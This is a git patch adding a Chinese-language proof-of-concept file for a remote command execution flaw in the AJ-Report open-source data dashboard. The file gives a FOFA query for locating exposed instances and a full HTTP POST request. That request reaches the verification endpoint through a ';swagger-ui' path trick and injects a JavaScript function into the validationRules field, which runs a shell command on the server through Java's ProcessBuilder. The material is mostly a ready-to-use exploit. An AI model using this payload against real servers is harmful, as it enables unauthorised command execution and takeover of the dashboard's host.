From a8ac659e673aa939f908d7fc83f9b2bdf77af074 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 4 May 2024 13:29:11 +0800 Subject: [PATCH] =?UTF-8?q?Create=20AJ-Report=E5=BC=80=E6=BA=90=E6=95=B0?= =?UTF-8?q?=E6=8D=AE=E5=A4=A7=E5=B1=8F=E5=AD=98=E5=9C=A8=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- AJ-Report开源数据大屏存在远程命令执行漏洞.md | 28 ++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 AJ-Report开源数据大屏存在远程命令执行漏洞.md diff --git a/AJ-Report开源数据大屏存在远程命令执行漏洞.md b/AJ-Report开源数据大屏存在远程命令执行漏洞.md new file mode 100644 index 0000000..c205c6e --- /dev/null +++ b/AJ-Report开源数据大屏存在远程命令执行漏洞.md @@ -0,0 +1,28 @@ +## AJ-Report开源数据大屏存在远程命令执行漏洞 + +该平台可以通过post方式在validationRules参数对应值中进行命令执行,可以获得服务器权限,登陆管理后台接管大屏。如果被不法分子利用,书写反动标语,危害后果十分严重。 + +## fofa +``` +title="AJ-Report" +``` + +## poc +``` +POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Content-Type: application/json;charset=UTF-8 +Connection: close + +{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} +``` + +![image](https://github.com/wy876/POC/assets/139549762/8e96cef4-ea6f-4600-b622-9deb360ae42e) + + +## 漏洞来源 +- https://gitee.com/anji-plus/report/issues/I9HCB2